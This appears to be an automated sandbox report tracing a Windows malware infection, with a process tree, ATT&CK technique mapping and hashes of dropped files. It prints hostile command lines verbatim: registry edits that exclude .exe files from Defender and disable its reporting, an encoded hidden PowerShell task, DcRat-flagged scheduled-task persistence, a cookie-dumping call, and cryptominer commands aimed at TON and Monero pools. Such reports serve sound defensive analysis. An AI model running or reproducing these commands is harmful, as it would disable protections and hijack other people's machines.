"C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3588

C:\Users\Admin\AppData\Local\Temp\A59L1.exe
"C:\Users\Admin\AppData\Local\Temp\A59L1.exe"
4⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\KJAC6.exe
"C:\Users\Admin\AppData\Local\Temp\KJAC6.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5652

C:\Users\Admin\AppData\Local\Temp\BFE5C.exe
"C:\Users\Admin\AppData\Local\Temp\BFE5C.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:648

C:\Users\Admin\AppData\Local\Temp\57F2H.exe
"C:\Users\Admin\AppData\Local\Temp\57F2H.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3440

C:\Users\Admin\AppData\Local\Temp\1CILB.exe
"C:\Users\Admin\AppData\Local\Temp\1CILB.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4252

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
5⤵
PID:1044

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
6⤵
PID:4700

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
7⤵
PID:2556

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
8⤵
PID:744

C:\Users\Admin\AppData\Local\Temp\1CILB33H9E8BCC5.exe
https://iplogger.org/1nChi7
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5336

C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe
"C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6020

C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe
"C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5352

C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"
4⤵
PID:5760

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
5⤵
PID:2220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:5088

C:\Windows\notepad.exe
C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
5⤵
PID:5912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5912 -s 440
6⤵
- Program crash
PID:2648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5912 -s 484
6⤵
- Program crash
PID:5840

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
5⤵
PID:4488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4488 -s 260
6⤵
- Program crash
PID:5776

C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe"
4⤵
PID:4940

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
5⤵
PID:5160

C:\Windows\notepad.exe
C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
5⤵
PID:4528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4528 -s 440
6⤵
- Program crash
PID:1308

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4528 -s 448
6⤵
- Program crash
PID:6088

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
5⤵
PID:1688

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1688 -s 260
6⤵
- Program crash
PID:6072

C:\Users\Admin\Documents\9FJLQu4A_WqLnwf6TNi2ThAm.exe
"C:\Users\Admin\Documents\9FJLQu4A_WqLnwf6TNi2ThAm.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5412

C:\Users\Admin\Documents\gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
"C:\Users\Admin\Documents\gsRqUqtuYTRkYMiJYJ0ZdsHq.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5836

C:\Users\Admin\Documents\XB562pl90hdu1ztAiENZv8ad.exe
"C:\Users\Admin\Documents\XB562pl90hdu1ztAiENZv8ad.exe"
3⤵
- Executes dropped EXE
PID:5288

C:\Users\Admin\Documents\DyxVIXsNsKer_eZTImK_hMIG.exe
"C:\Users\Admin\Documents\DyxVIXsNsKer_eZTImK_hMIG.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5832

C:\Users\Admin\AppData\Local\Temp\7zSB91.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6076

C:\Users\Admin\AppData\Local\Temp\7zS2DDF.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5312

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:5592

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2040

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:4940

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:5468

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:1848

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:5088

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:6088

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gyJkcnhJQ" /SC once /ST 00:46:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- DcRat
- Creates scheduled task(s)
PID:4700

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gyJkcnhJQ"
6⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gyJkcnhJQ"
6⤵
PID:4140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 22:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\Qpeovok.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:5340

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
PID:4268

C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:380

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Users\Admin\AppData\Local\Temp\pzyh.exe
"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5116

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2716

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2964

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3296 -ip 3296
1⤵
PID:4248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5404 -ip 5404
1⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5536 -ip 5536
1⤵
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6020 -ip 6020
1⤵
PID:5516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:5760

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:4312

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:5956

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:3120

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:5400

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:5520

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5432

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6020 -ip 6020
1⤵
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5736 -ip 5736
1⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5636 -ip 5636
1⤵
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5404 -ip 5404
1⤵
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5636 -ip 5636
1⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5736 -ip 5736
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5536 -ip 5536
1⤵
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\cmmon32\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5636 -ip 5636
1⤵
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5328

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5636 -ip 5636
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5636 -ip 5636
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5636 -ip 5636
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5636 -ip 5636
1⤵
PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5636 -ip 5636
1⤵
PID:4536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5636 -ip 5636
1⤵
PID:1628

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 4488 -ip 4488
1⤵
PID:5508

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 1688 -ip 1688
1⤵
PID:4660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 4528 -ip 4528
1⤵
PID:1856

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 5912 -ip 5912
1⤵
PID:1180

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 5912 -ip 5912
1⤵
PID:5320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 4528 -ip 4528
1⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\Qpeovok.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\Qpeovok.exe j6 /site_id 525403 /S
1⤵
PID:5936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
MD5
16b7ea3d9ded8abc287766b4e32b49bd

SHA1
34591d96a05d691c4b4b23d34c6a82f41452f271

SHA256
1fd0c3e6e56314ce40905433b34de84d2f4ad04f2a588cd3e51668b3c9cfc602

SHA512
2b86aa86787a0f23e81bc0ea02f77505d4ce70715636f8d8915d4b70edfbc819f7c4a9102de6592f9aa4e704e79a9e7ab81b9cda3df28c1c5704d56a2f3b1086

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
2f7f40bc0fb1467c682bcfddc53e54c7

SHA1
c3e6f3cf8051cee6955595bca31b6d3aed296717

SHA256
9433f5b46e3638bbbc9a38c96d8ae4681f54f59537e05b2bf3e4917ed28d864b

SHA512
3e08f077016f7dfb37cccdc12059ae48a9e843e77c75e3736c146b10a4cffc70bd26383378b41f3f2cf65f390ccc711c36ac0c03bc7297823fe2ae4f033054ef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
MD5
18264c148efa187bfeb1ec6ef945e58a

SHA1
756b02554e4757e65c5dbf83d8053f2515e08db0

SHA256
38292f4842e86777fbcac91e4fad8150e23bdf8e7eeb7d5c99b247774b119f28

SHA512
eab3a85d9d003887223f23fcf9b7caf1f467d5de06e08f9d3d500beb9b5cd408d60c5cfd0e9b4ad77c9d395627138c1a6ca07f9646459dddfbcab84c48298ee7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
de477c625e69a07beb047419ff93d06a

SHA1
e843c5967dffa6ebd94c3083da5a14b60233de04

SHA256
ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552

SHA512
ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
de477c625e69a07beb047419ff93d06a

SHA1
e843c5967dffa6ebd94c3083da5a14b60233de04

SHA256
ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552

SHA512
ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
de477c625e69a07beb047419ff93d06a

SHA1
e843c5967dffa6ebd94c3083da5a14b60233de04

SHA256
ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552

SHA512
ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
MD5
20ae7d932efb3e37e859f97691d80aa1

SHA1
65e316cbc05429663f8614b0903a832ea0713880

SHA256
fdca533d9c045700580a760d66a1f425bb777444bd83989d75223bc5073534d6

SHA512
eda64e5687b15709011f985e90e5c8ace40587f50f0b93b4a714d7efc4146ca620064919d56afea61ebcb8ff6fcf6db9b812cd93e527010723e061e76dd42cb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CC4F.tmp
MD5
4f3387277ccbd6d1f21ac5c07fe4ca68

SHA1
e16506f662dc92023bf82def1d621497c8ab5890

SHA256
767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac

SHA512
9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
c526f927ebf81b6c0a6675ca40b4fa52

SHA1
57c9b4e998e1f5708ffcb675de1da7c0a6c30554

SHA256
70a91fbda72aa2585f8d5dfd228020dfef14be0eeea07210b10dcd05f2fefd1e

SHA512
cb53c1c5d7fd1dfe99944bd12d948fb926a4154102ddd28f0a1d5d5b28b958a89e9d8caa3eb106e50eb31d527bab52291e86e1c0ba723a13454b6e28382de1a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
c526f927ebf81b6c0a6675ca40b4fa52

SHA1
57c9b4e998e1f5708ffcb675de1da7c0a6c30554

SHA256
70a91fbda72aa2585f8d5dfd228020dfef14be0eeea07210b10dcd05f2fefd1e

SHA512
cb53c1c5d7fd1dfe99944bd12d948fb926a4154102ddd28f0a1d5d5b28b958a89e9d8caa3eb106e50eb31d527bab52291e86e1c0ba723a13454b6e28382de1a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
6f247a83bc3a67c637a5ebe91fde109a

SHA1
827e9e2717e04f5768da944bc87386d03fe8c732

SHA256
1558f756b05cbfd9a303da3129a68cf7aeab568cc58388180d979a785296c7dd

SHA512
